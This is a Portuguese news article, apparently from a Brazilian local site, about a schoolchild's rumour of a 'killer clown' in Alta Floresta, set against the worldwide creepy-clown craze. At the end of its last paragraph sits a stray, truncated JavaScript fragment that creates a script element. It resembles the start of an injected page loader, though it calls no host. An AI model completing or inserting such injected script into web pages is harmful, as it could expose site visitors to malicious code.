Capa / Em Destaque / Palhaços macabros em Alta Floresta?

Palhaços macabros em Alta Floresta?

noticia_palhacoDa Redação

Se esta moda pega… O relato que recebemos nesta semana veio de uma aluna de uma escola pública de Alta Floresta, que assustada chegou até os familiares e “informou” ter ouvido dizer que um “palhaço assassino” estaria agindo em Alta Floresta e até já tinha feito uma vítima. Em outro momento, a brincadeira até poderia ser considerada inofensiva, no entanto, existe uma onda mundial que iniciou nos Estados Unidos, passou pelo Reino Unido, Canadá e já teve os primeiros relatos no Brasil nos estados do Rio Grande do S ul, Paraíba e Mato Grosso do Sul, onde pessoas vestem a fantasia de um palhaço macabro para assustar e fazer suas vítimas, ainda não há relatos no Brasil de assassinatos cometidos pelos palhaços aterrorizantes.

O relato em Alta Floresta aconteceu nesta segunda-feira 18, uma criança de 11 anos de idade chegou em casa e disse ter ouvido que o ‘palhaço macabro’ estava na cidade e já havia até mesmo assassinado um cidadão no semáforo no setor industrial. O alerta era que pais e mães não largassem seus filhos sozinhos, pois algo ou alguém estaria assassinando crianças.

Essa história que começou nos Estados Unidos já tem dado muito ‘pano para manga’ e muitas das pessoas que se vestem de palhaços usam as roupas coloridas que todos nós conhecemos, mas a diferença está no uso de máscaras com expressões de terror. Normalmente, os palhaços andam pelas ruas à noite, em parques e locais menos iluminados, de onde aparecem de forma repentina para assustar pedestres e motoristas. Uma conta no Twitter, intitulada “Avistamento de Palhaços”, tem mais de 100 mil seguidores e dezenas de fotos e vídeos feitos nos EUA e em outras partes do mundo.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top